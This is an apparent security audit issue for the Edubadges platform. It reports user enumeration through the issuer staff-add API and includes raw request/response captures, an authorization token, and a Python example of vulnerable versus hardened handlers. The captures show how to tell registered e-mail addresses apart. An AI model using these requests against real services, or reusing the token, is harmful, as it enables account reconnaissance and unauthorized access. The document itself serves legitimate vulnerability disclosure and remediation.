edubadges / audit

Code audit repo for Edubadges

User Enumeration using the issuer manage staff functionality #8

Open sveeke opened 6 years ago

sveeke commented 6 years ago

When adding a new staff member to an issuer, the response allows one to determine whether a user exists or not.

sveeke commented 6 years ago

threatLevel="Low" type="Account Enumeration"

When adding a new staff member to an issuer, the response allows one to determine whether a user exists or not.


Non-existing user:

POST /v1/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff
Content-Length: 79
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"action":"add","email":"stefanpentest+admin@gmail.com","role":"owner"}

HTTP/1.1 404 Not Found
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:48:53 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 76

"User not found. Email must be verified and correspond to an existing user."

Existing user:

POST /v1/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff
Content-Length: 79
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"action":"add","email":"stefanpentest+administrator@gmail.com","role":"owner"}

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:49:10 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 149

{"user":{"first_name":"Stefan","last_name":"Pentest","email":"stefanpentest+administrator@gmail.com","slug":"OhBbDf5TQ-mc1ARkS6gOwA"},"role":"owner"}

Impact: Existing user accounts can be enumerated by guessing email addresses.

Recommendation: Ensure the responses for existing and non-existing users match exactly so that attackers cannot differentiate.
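The recommendation above in code, as an added example that is not part of the audit or of the Edubadges/Badgr code base: a minimal handler for the staff-add request, once reproducing the 404/200 split shown in the two captures and once returning one identical response whether or not the e-mail belongs to a user. The in-memory user store, the function names, the 202 status and the hardened message text are assumptions.

```python
# Added example (not Edubadges/Badgr code): handler for POST .../issuers/<slug>/staff
# with the body {"action":"add","email":...,"role":...} seen in this issue.
# The user store, names and response shapes are assumed for illustration.
import json

# Constructed sample user store keyed by verified e-mail address.
USERS = {
    "stefanpentest+administrator@gmail.com": {
        "first_name": "Stefan", "last_name": "Pentest", "slug": "OhBbDf5TQ-mc1ARkS6gOwA",
    },
}

def add_staff_vulnerable(payload, users=USERS):
    """Mirrors the observed behaviour: 404 for an unknown address, 200 plus the
    user's profile for a known one. Status, body and length all differ, so a
    caller learns which addresses are registered (and gets profile data)."""
    email = payload.get("email", "")
    user = users.get(email)
    if user is None:
        return 404, json.dumps("User not found. Email must be verified and correspond to an existing user.")
    return 200, json.dumps({"user": {**user, "email": email}, "role": payload.get("role")})

def add_staff_hardened(payload, users=USERS, outbox=None):
    """Same status and byte-identical body for known and unknown addresses.

    The lookup result only decides what happens out-of-band (here: an invitation
    queued in `outbox`, standing in for an e-mail); nothing about it, and no
    profile data, is placed in the HTTP response."""
    email = payload.get("email", "")
    user = users.get(email)
    if user is not None and outbox is not None:
        outbox.append({"to": email, "role": payload.get("role")})  # stays off the wire
    body = {"detail": "If the address belongs to a verified user, they have been invited to this issuer."}
    return 202, json.dumps(body)

def responses_distinguishable(handler, known_email, unknown_email):
    """True if the (status, body) pair lets an observer tell the two addresses apart."""
    r_known = handler({"action": "add", "email": known_email, "role": "owner"})
    r_unknown = handler({"action": "add", "email": unknown_email, "role": "owner"})
    return r_known != r_unknown
```

The same check can be run against a live endpoint during retesting by comparing status code, headers and body of the two captures above rather than the in-process tuples.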